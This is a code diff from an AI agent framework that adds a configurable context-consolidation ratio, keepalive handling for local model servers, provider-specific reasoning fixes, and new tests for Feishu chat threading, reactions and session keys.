@ -90,6 +90,13 @@ class AgentDefaults(Base):
|
||||
validation_alias=AliasChoices("idleCompactAfterMinutes", "sessionTtlMinutes"),
|
||||
serialization_alias="idleCompactAfterMinutes",
|
||||
) # Auto-compact idle threshold in minutes (0 = disabled)
|
||||
consolidation_ratio: float = Field(
|
||||
default=0.5,
|
||||
ge=0.1,
|
||||
le=0.95,
|
||||
validation_alias=AliasChoices("consolidationRatio"),
|
||||
serialization_alias="consolidationRatio",
|
||||
) # Consolidation target ratio (0.5 = 50% of budget retained after compression)
|
||||
dream: DreamConfig = Field(default_factory=DreamConfig)
|
||||
|
||||
|
||||
|
||||
@ -84,6 +84,7 @@ class Nanobot:
|
||||
unified_session=defaults.unified_session,
|
||||
disabled_skills=defaults.disabled_skills,
|
||||
session_ttl_minutes=defaults.session_ttl_minutes,
|
||||
consolidation_ratio=defaults.consolidation_ratio,
|
||||
tools_config=config.tools,
|
||||
)
|
||||
return cls(loop)
|
||||
|
||||
@ -3,17 +3,20 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import json
|
||||
import hashlib
|
||||
import importlib.util
|
||||
import json
|
||||
import os
|
||||
import secrets
|
||||
import string
|
||||
import time
|
||||
import uuid
|
||||
from collections.abc import Awaitable, Callable
|
||||
from ipaddress import ip_address
|
||||
from typing import TYPE_CHECKING, Any
|
||||
from urllib.parse import urlparse
|
||||
|
||||
import httpx
|
||||
import json_repair
|
||||
from loguru import logger
|
||||
|
||||
@ -159,6 +162,37 @@ _RESPONSES_FAILURE_THRESHOLD = 3
|
||||
_RESPONSES_PROBE_INTERVAL_S = 300 # 5 minutes
|
||||
|
||||
|
||||
def _is_local_endpoint(
|
||||
spec: "ProviderSpec | None",
|
||||
api_base: str | None,
|
||||
) -> bool:
|
||||
"""Return True when the endpoint is a local or LAN model server.
|
||||
|
||||
Matches either the provider spec's ``is_local`` flag or common private-
|
||||
network patterns in the base URL (localhost, 127.x, 192.168.x, 10.x,
|
||||
172.16-31.x, Docker ``host.docker.internal``).
|
||||
"""
|
||||
if spec and spec.is_local:
|
||||
return True
|
||||
if not api_base:
|
||||
return False
|
||||
raw = api_base.strip().lower()
|
||||
parsed = urlparse(raw if "://" in raw else f"//{raw}")
|
||||
try:
|
||||
host = parsed.hostname
|
||||
except ValueError:
|
||||
return False
|
||||
if host in {"localhost", "host.docker.internal"}:
|
||||
return True
|
||||
if not host:
|
||||
return False
|
||||
try:
|
||||
addr = ip_address(host)
|
||||
except ValueError:
|
||||
return False
|
||||
return addr.is_loopback or addr.is_private
|
||||
|
||||
|
||||
def _is_direct_openai_base(api_base: str | None) -> bool:
|
||||
"""Return True for direct OpenAI endpoints, not generic OpenAI-compatible gateways."""
|
||||
if not api_base:
|
||||
@ -208,11 +242,27 @@ class OpenAICompatProvider(LLMProvider):
|
||||
if extra_headers:
|
||||
default_headers.update(extra_headers)
|
||||
|
||||
# Local model servers (Ollama, llama.cpp, vLLM) often close idle
|
||||
# HTTP connections before the client-side keepalive expires. When
|
||||
# two LLM calls happen seconds apart (e.g. heartbeat _decide then
|
||||
# process_direct), the second call may grab a now-dead pooled
|
||||
# connection, causing a transient APIConnectionError on every first
|
||||
# attempt. Disabling keepalive for local endpoints avoids this by
|
||||
# opening a fresh connection for each request, which is cheap on a
|
||||
# LAN. Cloud providers benefit from keepalive, so we leave the
|
||||
# default pool settings for them.
|
||||
http_client: httpx.AsyncClient | None = None
|
||||
if _is_local_endpoint(spec, effective_base):
|
||||
http_client = httpx.AsyncClient(
|
||||
limits=httpx.Limits(keepalive_expiry=0),
|
||||
)
|
||||
|
||||
self._client = AsyncOpenAI(
|
||||
api_key=api_key or "no-key",
|
||||
base_url=effective_base,
|
||||
default_headers=default_headers,
|
||||
max_retries=0,
|
||||
http_client=http_client,
|
||||
)
|
||||
|
||||
# Responses API circuit breaker: skip after repeated failures,
|
||||
@ -334,6 +384,47 @@ class OpenAICompatProvider(LLMProvider):
|
||||
clean["tool_call_id"] = map_id(clean["tool_call_id"])
|
||||
return self._enforce_role_alternation(sanitized)
|
||||
|
||||
def _drop_deepseek_incomplete_reasoning_history(
|
||||
self,
|
||||
messages: list[dict[str, Any]],
|
||||
reasoning_effort: str | None,
|
||||
) -> list[dict[str, Any]]:
|
||||
if (
|
||||
not self._spec
|
||||
or self._spec.name != "deepseek"
|
||||
or not reasoning_effort
|
||||
or reasoning_effort.lower() == "none"
|
||||
):
|
||||
return messages
|
||||
|
||||
bad_idx = None
|
||||
for idx, msg in enumerate(messages):
|
||||
if (
|
||||
msg.get("role") == "assistant"
|
||||
and msg.get("tool_calls")
|
||||
and not msg.get("reasoning_content")
|
||||
):
|
||||
bad_idx = idx
|
||||
if bad_idx is None:
|
||||
return messages
|
||||
|
||||
keep_from = None
|
||||
for idx in range(bad_idx + 1, len(messages)):
|
||||
if messages[idx].get("role") == "user":
|
||||
keep_from = idx
|
||||
break
|
||||
|
||||
if keep_from is None:
|
||||
trimmed = messages[:bad_idx]
|
||||
else:
|
||||
prefix = [msg for msg in messages[:keep_from] if msg.get("role") == "system"]
|
||||
trimmed = prefix + messages[keep_from:]
|
||||
logger.warning(
|
||||
"Dropped {} DeepSeek thinking history message(s) with incomplete reasoning_content",
|
||||
len(messages) - len(trimmed),
|
||||
)
|
||||
return trimmed
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# Build kwargs
|
||||
# ------------------------------------------------------------------
|
||||
@ -374,6 +465,10 @@ class OpenAICompatProvider(LLMProvider):
|
||||
if spec and spec.strip_model_prefix:
|
||||
model_name = model_name.split("/")[-1]
|
||||
|
||||
messages = self._drop_deepseek_incomplete_reasoning_history(
|
||||
messages,
|
||||
reasoning_effort,
|
||||
)
|
||||
kwargs: dict[str, Any] = {
|
||||
"model": model_name,
|
||||
"messages": self._sanitize_messages(self._sanitize_empty_content(messages)),
|
||||
@ -709,8 +804,8 @@ class OpenAICompatProvider(LLMProvider):
|
||||
finish_reason = str(choice0.get("finish_reason") or "stop")
|
||||
|
||||
raw_tool_calls: list[Any] = []
|
||||
# StepFun Plan: fallback to reasoning field when content is empty
|
||||
if not content and msg0.get("reasoning"):
|
||||
# StepFun: fallback to reasoning field when content is empty
|
||||
if not content and msg0.get("reasoning") and self._spec and self._spec.reasoning_as_content:
|
||||
content = self._extract_text_content(msg0.get("reasoning"))
|
||||
reasoning_content = msg0.get("reasoning_content")
|
||||
if not reasoning_content and msg0.get("reasoning"):
|
||||
@ -770,7 +865,7 @@ class OpenAICompatProvider(LLMProvider):
|
||||
finish_reason = ch.finish_reason
|
||||
if not content and m.content:
|
||||
content = m.content
|
||||
if not content and getattr(m, "reasoning", None):
|
||||
if not content and getattr(m, "reasoning", None) and self._spec and self._spec.reasoning_as_content:
|
||||
content = m.reasoning
|
||||
|
||||
tool_calls = []
|
||||
|
||||
@ -71,6 +71,11 @@ class ProviderSpec:
|
||||
# "reasoning_split" — {"reasoning_split": true/false} (MiniMax)
|
||||
thinking_style: str = ""
|
||||
|
||||
# When True, treat the "reasoning" response field as formal content
|
||||
# when "content" is empty. Only set this for providers (e.g. StepFun)
|
||||
# whose API returns the actual answer in "reasoning" instead of "content".
|
||||
reasoning_as_content: bool = False
|
||||
|
||||
@property
|
||||
def label(self) -> str:
|
||||
return self.display_name or self.name.title()
|
||||
@ -325,6 +330,7 @@ PROVIDERS: tuple[ProviderSpec, ...] = (
|
||||
display_name="Step Fun",
|
||||
backend="openai_compat",
|
||||
default_api_base="https://api.stepfun.com/v1",
|
||||
reasoning_as_content=True,
|
||||
),
|
||||
# Xiaomi MIMO (小米): OpenAI-compatible API
|
||||
ProviderSpec(
|
||||
|
||||
@ -46,10 +46,14 @@ class Session:
|
||||
unconsolidated = self.messages[self.last_consolidated:]
|
||||
sliced = unconsolidated[-max_messages:]
|
||||
|
||||
# Avoid starting mid-turn when possible.
|
||||
# Avoid starting mid-turn when possible, except for proactive
|
||||
# assistant deliveries that the user may be replying to.
|
||||
for i, message in enumerate(sliced):
|
||||
if message.get("role") == "user":
|
||||
sliced = sliced[i:]
|
||||
start = i
|
||||
if i > 0 and sliced[i - 1].get("_channel_delivery"):
|
||||
start = i - 1
|
||||
sliced = sliced[start:]
|
||||
break
|
||||
|
||||
# Drop orphan tool results at the front.
|
||||
|
||||
108
tests/agent/test_consolidation_ratio.py
Normal file
108
tests/agent/test_consolidation_ratio.py
Normal file
@ -0,0 +1,108 @@
|
||||
"""Tests for configurable consolidation_ratio."""
|
||||
|
||||
from unittest.mock import AsyncMock, MagicMock
|
||||
|
||||
import pytest
|
||||
from pydantic import ValidationError
|
||||
|
||||
import nanobot.agent.memory as memory_module
|
||||
from nanobot.agent.loop import AgentLoop
|
||||
from nanobot.bus.queue import MessageBus
|
||||
from nanobot.config.schema import AgentDefaults
|
||||
from nanobot.providers.base import GenerationSettings, LLMResponse
|
||||
|
||||
|
||||
def _make_loop(
|
||||
tmp_path,
|
||||
*,
|
||||
estimated_tokens: int = 0,
|
||||
context_window_tokens: int = 200,
|
||||
consolidation_ratio: float = 0.5,
|
||||
) -> AgentLoop:
|
||||
provider = MagicMock()
|
||||
provider.get_default_model.return_value = "test-model"
|
||||
provider.generation = GenerationSettings(max_tokens=0)
|
||||
provider.estimate_prompt_tokens.return_value = (estimated_tokens, "test-counter")
|
||||
_response = LLMResponse(content="ok", tool_calls=[])
|
||||
provider.chat_with_retry = AsyncMock(return_value=_response)
|
||||
provider.chat_stream_with_retry = AsyncMock(return_value=_response)
|
||||
|
||||
loop = AgentLoop(
|
||||
bus=MessageBus(),
|
||||
provider=provider,
|
||||
workspace=tmp_path,
|
||||
model="test-model",
|
||||
context_window_tokens=context_window_tokens,
|
||||
consolidation_ratio=consolidation_ratio,
|
||||
)
|
||||
loop.tools.get_definitions = MagicMock(return_value=[])
|
||||
loop.consolidator._SAFETY_BUFFER = 0
|
||||
return loop
|
||||
|
||||
|
||||
def _session_with_turns(loop: AgentLoop, *, turns: int):
|
||||
session = loop.sessions.get_or_create("cli:test")
|
||||
session.messages = []
|
||||
for i in range(turns):
|
||||
session.messages.append({"role": "user", "content": f"u{i}", "timestamp": f"2026-01-01T00:00:{i:02d}"})
|
||||
session.messages.append({"role": "assistant", "content": f"a{i}", "timestamp": f"2026-01-01T00:01:{i:02d}"})
|
||||
loop.sessions.save(session)
|
||||
return session
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
@pytest.mark.parametrize(
|
||||
("ratio", "context_window_tokens", "estimates", "expected_archives"),
|
||||
[
|
||||
(0.5, 200, [250, 90], 1),
|
||||
(0.1, 1000, [1200, 800, 400, 50], 2),
|
||||
(0.9, 200, [300, 175], 1),
|
||||
],
|
||||
)
|
||||
async def test_consolidation_ratio_controls_target(
|
||||
tmp_path,
|
||||
monkeypatch,
|
||||
ratio: float,
|
||||
context_window_tokens: int,
|
||||
estimates: list[int],
|
||||
expected_archives: int,
|
||||
) -> None:
|
||||
loop = _make_loop(
|
||||
tmp_path,
|
||||
context_window_tokens=context_window_tokens,
|
||||
consolidation_ratio=ratio,
|
||||
)
|
||||
loop.consolidator.archive = AsyncMock(return_value=True) # type: ignore[method-assign]
|
||||
session = _session_with_turns(loop, turns=10)
|
||||
|
||||
remaining_estimates = list(estimates)
|
||||
|
||||
def mock_estimate(_session, *, session_summary=None):
|
||||
assert session_summary is None
|
||||
return (remaining_estimates.pop(0), "test")
|
||||
|
||||
loop.consolidator.estimate_session_prompt_tokens = mock_estimate # type: ignore[method-assign]
|
||||
monkeypatch.setattr(memory_module, "estimate_message_tokens", lambda _m: 100)
|
||||
|
||||
await loop.consolidator.maybe_consolidate_by_tokens(session)
|
||||
|
||||
assert loop.consolidator.archive.await_count == expected_archives
|
||||
|
||||
|
||||
def test_ratio_propagated_from_config_schema() -> None:
|
||||
defaults = AgentDefaults()
|
||||
assert defaults.consolidation_ratio == 0.5
|
||||
|
||||
defaults = AgentDefaults.model_validate({"consolidationRatio": 0.3})
|
||||
assert defaults.consolidation_ratio == 0.3
|
||||
|
||||
dumped = defaults.model_dump(by_alias=True)
|
||||
assert dumped["consolidationRatio"] == 0.3
|
||||
|
||||
|
||||
def test_ratio_validation_rejects_out_of_range() -> None:
|
||||
with pytest.raises(ValidationError):
|
||||
AgentDefaults(consolidation_ratio=0.05)
|
||||
|
||||
with pytest.raises(ValidationError):
|
||||
AgentDefaults(consolidation_ratio=1.0)
|
||||
@ -1,6 +1,6 @@
|
||||
"""Tests for Feishu reaction add/remove and auto-cleanup on stream end."""
|
||||
from types import SimpleNamespace
|
||||
from unittest.mock import AsyncMock, MagicMock, patch
|
||||
from unittest.mock import AsyncMock, MagicMock
|
||||
|
||||
import pytest
|
||||
|
||||
@ -160,19 +160,38 @@ class TestRemoveReactionAsync:
|
||||
|
||||
|
||||
class TestStreamEndReactionCleanup:
|
||||
@pytest.mark.asyncio
|
||||
async def test_stream_buffers_are_scoped_by_message_id(self):
|
||||
ch = _make_channel()
|
||||
ch._create_streaming_card_sync = MagicMock(return_value=None)
|
||||
|
||||
await ch.send_delta(
|
||||
"oc_chat1", "first",
|
||||
metadata={"message_id": "om_first"},
|
||||
)
|
||||
await ch.send_delta(
|
||||
"oc_chat1", "second",
|
||||
metadata={"message_id": "om_second"},
|
||||
)
|
||||
|
||||
assert ch._stream_bufs["om_first"].text == "first"
|
||||
assert ch._stream_bufs["om_second"].text == "second"
|
||||
assert "oc_chat1" not in ch._stream_bufs
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_removes_reaction_on_stream_end(self):
|
||||
ch = _make_channel()
|
||||
ch._stream_bufs["oc_chat1"] = _FeishuStreamBuf(
|
||||
text="Done", card_id="card_1", sequence=3, last_edit=0.0,
|
||||
)
|
||||
ch._reaction_ids["om_001"] = "rx_42"
|
||||
ch._client.cardkit.v1.card_element.content.return_value = MagicMock(success=MagicMock(return_value=True))
|
||||
ch._client.cardkit.v1.card.settings.return_value = MagicMock(success=MagicMock(return_value=True))
|
||||
ch._remove_reaction = AsyncMock()
|
||||
|
||||
await ch.send_delta(
|
||||
"oc_chat1", "",
|
||||
metadata={"_stream_end": True, "message_id": "om_001", "reaction_id": "rx_42"},
|
||||
metadata={"_stream_end": True, "message_id": "om_001"},
|
||||
)
|
||||
|
||||
ch._remove_reaction.assert_called_once_with("om_001", "rx_42")
|
||||
@ -189,7 +208,7 @@ class TestStreamEndReactionCleanup:
|
||||
|
||||
await ch.send_delta(
|
||||
"oc_chat1", "",
|
||||
metadata={"_stream_end": True, "reaction_id": "rx_42"},
|
||||
metadata={"_stream_end": True},
|
||||
)
|
||||
|
||||
ch._remove_reaction.assert_not_called()
|
||||
|
||||
@ -3,7 +3,7 @@ import asyncio
|
||||
import json
|
||||
from pathlib import Path
|
||||
from types import SimpleNamespace
|
||||
from unittest.mock import MagicMock, patch
|
||||
from unittest.mock import AsyncMock, MagicMock, patch
|
||||
|
||||
import pytest
|
||||
|
||||
@ -21,18 +21,18 @@ from nanobot.bus.events import OutboundMessage
|
||||
from nanobot.bus.queue import MessageBus
|
||||
from nanobot.channels.feishu import FeishuChannel, FeishuConfig
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Helpers
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def _make_feishu_channel(reply_to_message: bool = False) -> FeishuChannel:
|
||||
def _make_feishu_channel(reply_to_message: bool = False, group_policy: str = "mention") -> FeishuChannel:
|
||||
config = FeishuConfig(
|
||||
enabled=True,
|
||||
app_id="cli_test",
|
||||
app_secret="secret",
|
||||
allow_from=["*"],
|
||||
reply_to_message=reply_to_message,
|
||||
group_policy=group_policy,
|
||||
)
|
||||
channel = FeishuChannel(config, MessageBus())
|
||||
channel._client = MagicMock()
|
||||
@ -443,3 +443,288 @@ async def test_on_message_no_extra_api_call_when_no_parent_id() -> None:
|
||||
|
||||
channel._client.im.v1.message.get.assert_not_called()
|
||||
assert len(captured) == 1
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Session key derivation tests
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_session_key_group_with_root_id_is_thread_scoped() -> None:
|
||||
"""Group message with root_id gets a thread-scoped session key."""
|
||||
channel = _make_feishu_channel(group_policy="open")
|
||||
bus_spy = []
|
||||
original_publish = channel.bus.publish_inbound
|
||||
|
||||
async def capture(msg):
|
||||
bus_spy.append(msg)
|
||||
await original_publish(msg)
|
||||
|
||||
channel.bus.publish_inbound = capture
|
||||
channel._download_and_save_media = AsyncMock(return_value=(None, ""))
|
||||
channel.transcribe_audio = AsyncMock(return_value="")
|
||||
channel._add_reaction = AsyncMock(return_value=None)
|
||||
|
||||
event = _make_feishu_event(
|
||||
chat_type="group",
|
||||
content='{"text": "hello"}',
|
||||
root_id="om_root123",
|
||||
message_id="om_child456",
|
||||
)
|
||||
await channel._on_message(event)
|
||||
|
||||
assert len(bus_spy) == 1
|
||||
assert bus_spy[0].session_key == "feishu:oc_abc:om_root123"
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_session_key_group_no_root_id_uses_message_id() -> None:
|
||||
"""Group message without root_id gets session keyed by message_id (per-message session)."""
|
||||
channel = _make_feishu_channel(group_policy="open")
|
||||
bus_spy = []
|
||||
original_publish = channel.bus.publish_inbound
|
||||
|
||||
async def capture(msg):
|
||||
bus_spy.append(msg)
|
||||
await original_publish(msg)
|
||||
|
||||
channel.bus.publish_inbound = capture
|
||||
channel._download_and_save_media = AsyncMock(return_value=(None, ""))
|
||||
channel.transcribe_audio = AsyncMock(return_value="")
|
||||
channel._add_reaction = AsyncMock(return_value=None)
|
||||
|
||||
event = _make_feishu_event(
|
||||
chat_type="group",
|
||||
content='{"text": "hello"}',
|
||||
root_id=None,
|
||||
message_id="om_001",
|
||||
)
|
||||
await channel._on_message(event)
|
||||
|
||||
assert len(bus_spy) == 1
|
||||
assert bus_spy[0].session_key == "feishu:oc_abc:om_001"
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_session_key_private_chat_no_override() -> None:
|
||||
"""Private chat never overrides session key (consistent with Telegram/Slack)."""
|
||||
channel = _make_feishu_channel()
|
||||
bus_spy = []
|
||||
original_publish = channel.bus.publish_inbound
|
||||
|
||||
async def capture(msg):
|
||||
bus_spy.append(msg)
|
||||
await original_publish(msg)
|
||||
|
||||
channel.bus.publish_inbound = capture
|
||||
channel._download_and_save_media = AsyncMock(return_value=(None, ""))
|
||||
channel.transcribe_audio = AsyncMock(return_value="")
|
||||
channel._add_reaction = AsyncMock(return_value=None)
|
||||
|
||||
event = _make_feishu_event(
|
||||
chat_type="p2p",
|
||||
content='{"text": "hello"}',
|
||||
root_id=None,
|
||||
message_id="om_001",
|
||||
)
|
||||
await channel._on_message(event)
|
||||
|
||||
assert len(bus_spy) == 1
|
||||
assert bus_spy[0].session_key_override is None
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# reply_in_thread tests
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_reply_uses_reply_in_thread_when_enabled() -> None:
|
||||
"""When reply_to_message is True, reply includes reply_in_thread=True."""
|
||||
channel = _make_feishu_channel(reply_to_message=True)
|
||||
|
||||
reply_resp = MagicMock()
|
||||
reply_resp.success.return_value = True
|
||||
channel._client.im.v1.message.reply.return_value = reply_resp
|
||||
|
||||
await channel.send(OutboundMessage(
|
||||
channel="feishu",
|
||||
chat_id="oc_abc",
|
||||
content="hello",
|
||||
metadata={"message_id": "om_001"},
|
||||
))
|
||||
|
||||
channel._client.im.v1.message.reply.assert_called_once()
|
||||
call_args = channel._client.im.v1.message.reply.call_args
|
||||
request = call_args[0][0]
|
||||
assert request.request_body.reply_in_thread is True
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_reply_without_reply_in_thread_when_disabled() -> None:
|
||||
"""When reply_to_message is False, reply does NOT use reply_in_thread."""
|
||||
channel = _make_feishu_channel(reply_to_message=False)
|
||||
|
||||
create_resp = MagicMock()
|
||||
create_resp.success.return_value = True
|
||||
channel._client.im.v1.message.create.return_value = create_resp
|
||||
|
||||
await channel.send(OutboundMessage(
|
||||
channel="feishu",
|
||||
chat_id="oc_abc",
|
||||
content="hello",
|
||||
))
|
||||
|
||||
# No message_id in metadata → no reply attempt, direct create
|
||||
channel._client.im.v1.message.create.assert_called_once()
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_reply_keeps_fallback_when_reply_fails() -> None:
|
||||
"""Even with reply_to_message=True, fallback to create on reply failure."""
|
||||
channel = _make_feishu_channel(reply_to_message=True)
|
||||
|
||||
reply_resp = MagicMock()
|
||||
reply_resp.success.return_value = False
|
||||
reply_resp.code = 99991400
|
||||
reply_resp.msg = "rate limited"
|
||||
channel._client.im.v1.message.reply.return_value = reply_resp
|
||||
|
||||
create_resp = MagicMock()
|
||||
create_resp.success.return_value = True
|
||||
channel._client.im.v1.message.create.return_value = create_resp
|
||||
|
||||
await channel.send(OutboundMessage(
|
||||
channel="feishu",
|
||||
chat_id="oc_abc",
|
||||
content="hello",
|
||||
metadata={"message_id": "om_001"},
|
||||
))
|
||||
|
||||
channel._client.im.v1.message.reply.assert_called()
|
||||
channel._client.im.v1.message.create.assert_called()
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_reply_no_reply_in_thread_for_p2p_chat() -> None:
|
||||
"""reply_in_thread should NOT be set for p2p chats (identified by chat_type)."""
|
||||
channel = _make_feishu_channel(reply_to_message=True)
|
||||
|
||||
reply_resp = MagicMock()
|
||||
reply_resp.success.return_value = True
|
||||
channel._client.im.v1.message.reply.return_value = reply_resp
|
||||
|
||||
await channel.send(OutboundMessage(
|
||||
channel="feishu",
|
||||
chat_id="oc_abc", # p2p chats also use oc_ prefix
|
||||
content="hello",
|
||||
metadata={"message_id": "om_001", "chat_type": "p2p"},
|
||||
))
|
||||
|
||||
channel._client.im.v1.message.reply.assert_called_once()
|
||||
call_args = channel._client.im.v1.message.reply.call_args
|
||||
request = call_args[0][0]
|
||||
assert request.request_body.reply_in_thread is not True
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_reply_uses_reply_in_thread_for_group_chat() -> None:
|
||||
"""reply_in_thread should be True for group chats (identified by chat_type)."""
|
||||
channel = _make_feishu_channel(reply_to_message=True)
|
||||
|
||||
reply_resp = MagicMock()
|
||||
reply_resp.success.return_value = True
|
||||
channel._client.im.v1.message.reply.return_value = reply_resp
|
||||
|
||||
await channel.send(OutboundMessage(
|
||||
channel="feishu",
|
||||
chat_id="oc_abc",
|
||||
content="hello",
|
||||
metadata={"message_id": "om_001", "chat_type": "group"},
|
||||
))
|
||||
|
||||
channel._client.im.v1.message.reply.assert_called_once()
|
||||
call_args = channel._client.im.v1.message.reply.call_args
|
||||
request = call_args[0][0]
|
||||
assert request.request_body.reply_in_thread is True
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_reply_targets_message_id_when_in_topic() -> None:
|
||||
"""When inbound message is inside a topic (root_id != message_id),
|
||||
the reply should target the inbound message_id (not root_id).
|
||||
The Feishu Reply API keeps the response in the same topic
|
||||
automatically when the target message is already inside a topic."""
|
||||
channel = _make_feishu_channel(reply_to_message=True)
|
||||
|
||||
reply_resp = MagicMock()
|
||||
reply_resp.success.return_value = True
|
||||
channel._client.im.v1.message.reply.return_value = reply_resp
|
||||
|
||||
await channel.send(OutboundMessage(
|
||||
channel="feishu",
|
||||
chat_id="oc_abc",
|
||||
content="hello",
|
||||
metadata={
|
||||
"message_id": "om_child456",
|
||||
"chat_type": "group",
|
||||
"root_id": "om_root123",
|
||||
},
|
||||
))
|
||||
|
||||
channel._client.im.v1.message.reply.assert_called_once()
|
||||
call_args = channel._client.im.v1.message.reply.call_args
|
||||
request = call_args[0][0]
|
||||
# Should reply to the inbound message_id, not the root
|
||||
assert request.message_id == "om_child456"
|
||||
assert request.request_body.reply_in_thread is True
|
||||
|
||||
|
||||
def test_on_reaction_added_stores_reaction_id() -> None:
|
||||
"""_on_reaction_added stores the returned reaction_id in _reaction_ids."""
|
||||
channel = _make_feishu_channel()
|
||||
loop = asyncio.new_event_loop()
|
||||
try:
|
||||
task = loop.create_task(asyncio.sleep(0, result="reaction_abc"))
|
||||
loop.run_until_complete(task)
|
||||
channel._on_reaction_added("om_001", task)
|
||||
finally:
|
||||
loop.close()
|
||||
|
||||
assert channel._reaction_ids["om_001"] == "reaction_abc"
|
||||
|
||||
|
||||
def test_on_reaction_added_skips_none_result() -> None:
|
||||
"""_on_reaction_added does not store None results."""
|
||||
channel = _make_feishu_channel()
|
||||
loop = asyncio.new_event_loop()
|
||||
try:
|
||||
task = loop.create_task(asyncio.sleep(0, result=None))
|
||||
loop.run_until_complete(task)
|
||||
channel._on_reaction_added("om_001", task)
|
||||
finally:
|
||||
loop.close()
|
||||
|
||||
assert "om_001" not in channel._reaction_ids
|
||||
|
||||
|
||||
def test_on_background_task_done_removes_from_set() -> None:
|
||||
"""_on_background_task_done removes task from tracking set."""
|
||||
channel = _make_feishu_channel()
|
||||
loop = asyncio.new_event_loop()
|
||||
try:
|
||||
async def _fail():
|
||||
raise RuntimeError("test failure")
|
||||
|
||||
task = loop.create_task(_fail())
|
||||
channel._background_tasks.add(task)
|
||||
try:
|
||||
loop.run_until_complete(task)
|
||||
except RuntimeError:
|
||||
pass # expected
|
||||
channel._on_background_task_done(task)
|
||||
finally:
|
||||
loop.close()
|
||||
|
||||
assert task not in channel._background_tasks
|
||||
|
||||
@ -8,6 +8,7 @@ from unittest.mock import AsyncMock, MagicMock, patch
|
||||
import pytest
|
||||
from typer.testing import CliRunner
|
||||
|
||||
from nanobot.agent.runtime import AgentRuntime
|
||||
from nanobot.bus.events import OutboundMessage
|
||||
from nanobot.cli.commands import _make_provider, app
|
||||
from nanobot.config.schema import Config
|
||||
@ -776,6 +777,15 @@ def _stop_gateway_provider(_config) -> object:
|
||||
raise _StopGatewayError("stop")
|
||||
|
||||
|
||||
def _test_agent_runtime(provider: object, config: Config) -> AgentRuntime:
|
||||
return AgentRuntime(
|
||||
provider=provider,
|
||||
model=config.agents.defaults.model,
|
||||
context_window_tokens=config.agents.defaults.context_window_tokens,
|
||||
signature=("test",),
|
||||
)
|
||||
|
||||
|
||||
def _patch_cli_command_runtime(
|
||||
monkeypatch,
|
||||
config: Config,
|
||||
@ -788,6 +798,8 @@ def _patch_cli_command_runtime(
|
||||
cron_service=None,
|
||||
get_cron_dir=None,
|
||||
) -> None:
|
||||
provider_factory = make_provider or (lambda _config: object())
|
||||
|
||||
monkeypatch.setattr(
|
||||
"nanobot.config.loader.set_config_path",
|
||||
set_config_path or (lambda _path: None),
|
||||
@ -800,7 +812,15 @@ def _patch_cli_command_runtime(
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
"nanobot.cli.commands._make_provider",
|
||||
make_provider or (lambda _config: object()),
|
||||
provider_factory,
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
"nanobot.agent.runtime.build_agent_runtime",
|
||||
lambda _config: _test_agent_runtime(provider_factory(_config), _config),
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
"nanobot.agent.runtime.load_agent_runtime",
|
||||
lambda _config_path=None: _test_agent_runtime(provider_factory(config), config),
|
||||
)
|
||||
|
||||
if message_bus is not None:
|
||||
@ -941,8 +961,36 @@ def test_gateway_cron_evaluator_receives_scheduled_reminder_context(
|
||||
monkeypatch.setattr("nanobot.config.loader.load_config", lambda _path=None: config)
|
||||
monkeypatch.setattr("nanobot.cli.commands.sync_workspace_templates", lambda _path: None)
|
||||
monkeypatch.setattr("nanobot.cli.commands._make_provider", lambda _config: provider)
|
||||
monkeypatch.setattr(
|
||||
"nanobot.agent.runtime.build_agent_runtime",
|
||||
lambda _config: _test_agent_runtime(provider, _config),
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
"nanobot.agent.runtime.load_agent_runtime",
|
||||
lambda _config_path=None: _test_agent_runtime(provider, config),
|
||||
)
|
||||
monkeypatch.setattr("nanobot.bus.queue.MessageBus", lambda: bus)
|
||||
monkeypatch.setattr("nanobot.session.manager.SessionManager", lambda _workspace: object())
|
||||
|
||||
class _FakeSession:
|
||||
def __init__(self) -> None:
|
||||
self.messages = []
|
||||
|
||||
def add_message(self, role: str, content: str, **kwargs) -> None:
|
||||
self.messages.append({"role": role, "content": content, **kwargs})
|
||||
|
||||
class _FakeSessionManager:
|
||||
def __init__(self, _workspace: Path) -> None:
|
||||
self.session = _FakeSession()
|
||||
seen["session_manager"] = self
|
||||
|
||||
def get_or_create(self, key: str) -> _FakeSession:
|
||||
seen["session_key"] = key
|
||||
return self.session
|
||||
|
||||
def save(self, session: _FakeSession) -> None:
|
||||
seen["saved_session"] = session
|
||||
|
||||
monkeypatch.setattr("nanobot.session.manager.SessionManager", _FakeSessionManager)
|
||||
|
||||
class _FakeCron:
|
||||
def __init__(self, _store_path: Path) -> None:
|
||||
@ -1030,6 +1078,16 @@ def test_gateway_cron_evaluator_receives_scheduled_reminder_context(
|
||||
content="Time to stretch.",
|
||||
)
|
||||
)
|
||||
assert seen["session_key"] == "telegram:user-1"
|
||||
saved_session = seen["saved_session"]
|
||||
assert isinstance(saved_session, _FakeSession)
|
||||
assert saved_session.messages == [
|
||||
{
|
||||
"role": "assistant",
|
||||
"content": "Time to stretch.",
|
||||
"_channel_delivery": True,
|
||||
}
|
||||
]
|
||||
|
||||
|
||||
def test_gateway_cron_job_suppresses_intermediate_progress(
|
||||
@ -1052,6 +1110,14 @@ def test_gateway_cron_job_suppresses_intermediate_progress(
|
||||
